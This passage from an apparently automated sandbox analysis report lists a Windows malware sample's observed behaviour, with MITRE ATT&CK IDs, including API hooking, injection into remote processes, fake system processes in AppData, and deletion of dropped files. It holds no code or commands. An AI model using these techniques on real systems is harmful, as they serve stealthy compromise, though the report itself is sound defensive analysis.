lsm.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005240)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"SetupDiGetDeviceRegistryPropertyA@SETUPAPI.DLL\" in \"CSRSS.EXE\"\n \"SetupDiGetClassDevsA@SETUPAPI.DLL\" in \"CSRSS.EXE\"\n \"SetupDiEnumDeviceInfo@SETUPAPI.DLL\" in \"CSRSS.EXE\"\n \"SetupDiGetDeviceRegistryPropertyW@SETUPAPI.DLL\" in \"CSRSS.EXE\"\n \"SetupDiGetClassDevsW@SETUPAPI.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"WinExec@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"send@WS2_32.DLL\" in \"4k51k4.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"OpenMutexA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindResourceW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"Process32NextW@KERNEL32.DLL\" in \"4k51k4.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\4K51K4.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\4K51K4.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\4K51K4.EXE\" with delete access\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"K:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"L:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"M:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"N:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"O:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"P:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"Q:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"R:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"S:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"T:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"U:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"V:\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" (UID: 00000000-00005240)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005188)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004972)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002712)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005440)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005592)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000640)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004996)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005664)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005068)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003392)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003520)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001256)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002640)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005248)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000920)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004800)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004624)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002732)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005620)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00000948)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005820)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001600)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000908)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005848)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003840)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002720)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00000620)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006048)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005452)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004656)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005260)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005504)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005728)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005208)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002300)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003120)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003380)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005952)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005956)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003572)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005752)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006032)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003560)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005212)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001452)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003260)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004012)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005888)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004244)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003536)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002752)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004356)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004364)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 604)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 604)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 604)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 604)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 604)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 604)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 312)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 312)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 312)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" allocated memory in \"C:\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\"\n \"4k51k4.exe\" allocated memory in \"%WINDIR%\\4k51k4.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005592)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000640)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005664)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005068)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003520)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002640)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005248)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004800)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002732)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00000948)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001600)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00000908)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005848)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002720)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00000620)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006048)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005452)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005260)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005504)\n Process \"SERVICES.EXE\" at non-system pathway 